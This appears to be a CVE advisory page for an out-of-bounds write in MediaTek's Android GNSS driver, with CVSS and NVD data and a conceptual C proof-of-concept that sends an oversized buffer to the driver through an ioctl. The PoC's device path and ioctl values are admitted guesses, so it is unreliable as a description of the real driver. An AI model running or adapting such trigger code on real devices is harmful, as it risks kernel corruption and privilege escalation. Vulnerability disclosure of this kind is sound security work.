Security Vulnerability Report
CVE-2025-20723 CVSS 7.8 HIGH

CVE-2025-20723

Published: 2025-10-14 10:15:37
Last Modified: 2025-10-15 18:41:01

Description

In gnss driver, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS09920033; Issue ID: MSV-3797.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-787 (Out-of-bounds Write)

Configurations (Affected Products)

cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:mediatek:mt6835:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt6878:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt6886:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt6897:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt6899:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt6985:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt6989:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt6991:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt8676:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt8678:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt8775:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt8791t:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt8796:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt8873:-:*:*:*:*:*:*:* - NOT VULNERABLE
Note: the NVD record expresses this as an AND configuration. The Android entries carry the vulnerability; the MediaTek hardware entries are marked "vulnerable: false" because they are the "running on/with" platform part of that configuration, not because those chipsets are unaffected.
MediaTek GNSS Driver (for the specific affected chipset models and versions, refer to the MediaTek October 2025 security bulletin)
Android devices built on affected MediaTek chipsets
IoT devices using the MediaTek GNSS driver

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// CVE-2025-20723 - MediaTek GNSS Driver Out-of-Bounds Write PoC
// This is a conceptual PoC demonstrating the vulnerability pattern
// Actual exploitation requires System privilege on the target device
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <errno.h>

// MediaTek GNSS device node (example path; not taken from the advisory)
#define MTK_GNSS_DEVICE "/dev/gnss"

// IOCTL commands for GNSS data processing (example values; not taken from the advisory)
#define GNSS_IOCTL_PROCESS_DATA 0x40045601
#define GNSS_IOCTL_SET_PARAMS   0x40045602

// Buffer size assumed to be used internally by the GNSS driver
#define GNSS_INTERNAL_BUF_SIZE 256

// Structure representing GNSS data input
typedef struct {
    unsigned int data_len;    // Length of the data buffer
    unsigned char *data;      // Pointer to data buffer
    unsigned int flags;       // Processing flags
} gnss_request_t;

int main(int argc, char *argv[])
{
    int fd;
    int ret;
    gnss_request_t req;
    unsigned char *malicious_data;

    (void)argc;
    (void)argv;

    printf("[+] CVE-2025-20723 PoC - MediaTek GNSS Driver OOB Write\n");
    printf("[+] Requires System privilege to access GNSS device\n");

    // Open the GNSS device
    fd = open(MTK_GNSS_DEVICE, O_RDWR);
    if (fd < 0) {
        printf("[-] Failed to open %s: %s (need System privilege)\n",
               MTK_GNSS_DEVICE, strerror(errno));
        printf("[-] This PoC requires an existing System-level foothold\n");
        return -1;
    }
    printf("[+] GNSS device opened successfully (fd=%d)\n", fd);

    // Allocate a buffer larger than the driver's internal buffer (256 bytes)
    // The vulnerability is triggered when data_len exceeds the internal buffer
    // without proper bounds checking
    unsigned int overflow_size = GNSS_INTERNAL_BUF_SIZE + 256;
    malicious_data = (unsigned char *)malloc(overflow_size);
    if (!malicious_data) {
        perror("malloc");
        close(fd);
        return -1;
    }

    // Fill the buffer with a pattern that will overwrite adjacent kernel memory
    // In a real exploit, this would contain ROP chain or kernel payload
    memset(malicious_data, 0x41, overflow_size);

    // Prepare the request structure
    req.data_len = overflow_size;   // Exceeds internal buffer size
    req.data = malicious_data;
    req.flags = 0x0;

    printf("[+] Sending oversized GNSS data (size=%u, internal_buf=%d)\n",
           overflow_size, GNSS_INTERNAL_BUF_SIZE);
    printf("[+] This should trigger out-of-bounds write in gnss driver\n");

    // Trigger the vulnerability via IOCTL
    // The driver fails to validate req.data_len against internal buffer size,
    // leading to out-of-bounds write
    ret = ioctl(fd, GNSS_IOCTL_PROCESS_DATA, &req);
    if (ret < 0) {
        printf("[-] IOCTL failed: %s\n", strerror(errno));
    } else {
        printf("[+] IOCTL returned: %d\n", ret);
        printf("[!] Out-of-bounds write may have occurred\n");
    }

    // Cleanup
    free(malicious_data);
    close(fd);

    printf("[+] PoC execution completed\n");
    printf("[!] Note: Actual exploitation requires System privilege (PR:L)\n");
    printf("[!] Patch: ALPS09920033\n");
    return 0;
}

References

https://corp.mediatek.com/product-security-bulletin/October-2025 (Vendor Advisory: MediaTek October 2025 Product Security Bulletin)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20723", "sourceIdentifier": "[email protected]", "published": "2025-10-14T10:15:37.210", "lastModified": "2025-10-15T18:41:00.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In gnss driver, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS09920033; Issue ID: MSV-3797."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6835:-:*:*:*:*:*:*:*", "matchCriteriaId": "19A63103-C708-48EC-B44D-5E465A6B79C5"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6878:-:*:*:*:*:*:*:*", "matchCriteriaId": "855A8046-34ED-4891-ACE5-76AB10AC8D53"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6886:-:*:*:*:*:*:*:*", "matchCriteriaId": 
"AF3E2B84-DAFE-4E11-B23B-026F719475F5"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6897:-:*:*:*:*:*:*:*", "matchCriteriaId": "2A7D8055-F4B6-41EE-A078-11D56285AB66"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6899:-:*:*:*:*:*:*:*", "matchCriteriaId": "C6E9F80F-9AC9-41E0-BB14-9DB6F14B62CD"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6985:-:*:*:*:*:*:*:*", "matchCriteriaId": "EA72CCD1-DEA2-48EB-8781-04CFDD41AAEE"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6989:-:*:*:*:*:*:*:*", "matchCriteriaId": "AD7DE6B2-66D9-4A3E-B15F-D56505559255"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6991:-:*:*:*:*:*:*:*", "matchCriteriaId": "CBBB30DF-E963-4940-B742-F6801F68C3FC"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt8676:-:*:*:*:*:*:*:*", "matchCriteriaId": "EE302F6F-170E-4350-A8F4-65BE0C50CB78"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt8678:-:*:*:*:*:*:*:*", "matchCriteriaId": "152A5F3D-8004-4649-BDB1-E6F0798AF1CB"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt8775:-:*:*:*:*:*:*:*", "matchCriteriaId": "DE5FB550-7264-4879-BAF9-6798949113AF"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt8791t:-:*:*:*:*:*:*:*", "matchCriteriaId": "1BB05B1D-77C9-4E42-91AD-9F087413DC20"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt8796:-:*:*:*:*:*:*:*", "matchCriteriaId": "DE933AD9-3A6F-421B-8AB3-C45F8DEA9548"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt8873:-:*:*:*:*:*:*:*", "matchCriteriaId": "D6DD525F-7050-42BD-829D-1121698B8009"}]}]}], "references": [{"url": "https://corp.mediatek.com/product-security-bulletin/October-2025", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}